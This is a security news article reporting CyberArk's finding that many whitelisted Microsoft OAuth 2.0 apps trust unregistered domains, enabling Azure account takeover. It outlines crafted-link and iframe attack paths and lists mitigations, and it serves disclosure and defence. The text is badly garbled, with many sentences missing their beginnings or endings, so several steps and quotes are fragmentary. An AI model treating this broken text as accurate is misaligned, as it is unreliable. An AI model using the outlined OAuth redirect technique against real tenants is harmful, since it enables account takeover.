There is a vulnerability
in specific Microsoft OAuth 2.0 applications that could let an attacker gain access
and control of a victim’s Azure account.
The flaw was
found by Cyberark researchers who noticed that many white-listed OAuth applications,
at least 54, automatically trust domains and sub-domains that are not
registered by Microsoft so anyone can do so. These apps are essentially given “approved”
status by default and can ask for an access_token.
combination of these two factors makes it possible to produce an action with
the user’s permissions – including gaining access to Azure resources, AD
resources and more,” a Cyberark
a takeover an attacker would have to convince the target to click on a link or
visit a compromised website. From here there are two paths an attacker can take
to gain control.
The link clicking
method sees the creation of a crafted link for Microsoft OAuth Web flow with
the vulnerable Microsoft applications; then sets the application_id to match
the vulnerable OAuth application; followed by setting the redirect_uri param to
the controlled white-listed domains. The attacker than changes the resource to
the one he wants to get access to on behalf of the user.
victim clicks on the crafted link and microsoftonline.com redirects him to the
domain sends API requests with the stolen access token.
To steps involved
when using a malicious website is basically the same, but with a few added
steps. After setting the redirect_uri parameter to the controlled, white-listed
domains the threat actor sets the resource parameter to the desired resource
that he wants to get access to on behalf of the user.
than places an iframe in a website with the src attribute set to the crafted
link so when the victim browses through the ifram redirects the person to the
attacker’s fake website with the newly created access token. Then, as with the
stolen access token.
2.0 is an excellent solution for authorization, if misused or misconfigured, it
could have a tremendous impact, allowing for over-privileged third-party
applications or the eventual account takeover by malicious attackers,” Cyberark
The company has
a free and automatic scanning tool for anyone to discover similar vulnerable
applications in their Azure environment at https://black.direct/
has several recommendations to mitigate the vulnerability.
sure that all the trusted redirect URIs configured in the application are under
unnecessary redirect URIs.
sure the permissions that the OAuth application asks for are the least
privileged one it needs.
The post OAuth vulnerability threatens Azure accounts appeared first on SC Media.